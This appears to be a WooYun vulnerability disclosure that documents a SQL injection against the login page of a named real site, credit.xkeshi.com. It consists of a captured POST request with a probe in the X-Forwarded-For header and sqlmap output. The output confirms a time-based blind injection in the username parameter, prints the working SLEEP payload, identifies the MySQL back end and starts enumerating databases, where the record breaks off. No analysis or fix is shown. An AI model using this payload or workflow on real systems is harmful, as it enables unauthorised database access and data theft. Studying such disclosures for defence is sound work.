WooYun.org

POST /user/login HTTP/1.1
Host: credit.xkeshi.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3b
Cookie: Hm_lvt_e31fc7871d44b542d1441f0ac128e773=1433342223; Hm_lpvt_e31fc7871d44b542d1441f0ac128e773=1433342271; JSESSIONID=1uqib0bochj2tyz9aatxw7w17; Hm_lvt_0ebd3318f96e1f5b8259fc3cdc476d5a=1433342237; Hm_lpvt_0ebd3318f96e1f5b8259fc3cdc476d5a=1433342867
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
username=admin&password=admin

POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 113 HTTP(s) req
uests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=admin') AND (SELECT * FROM (SELECT(SLEEP(5)))zgPQ) AND ('l
DWM'='lDWM&password=admin
---
[22:55:02] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[22:55:02] [INFO] fetching database names
[22:55:02] [INFO] fetching number of databases
[22:55:02] [INFO] retrieved:
[22:55:02] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[22:55:21] [INFO] adjusting time delay to 1 second due to good response times
7
[22:55:22] [INFO] retrieved: information_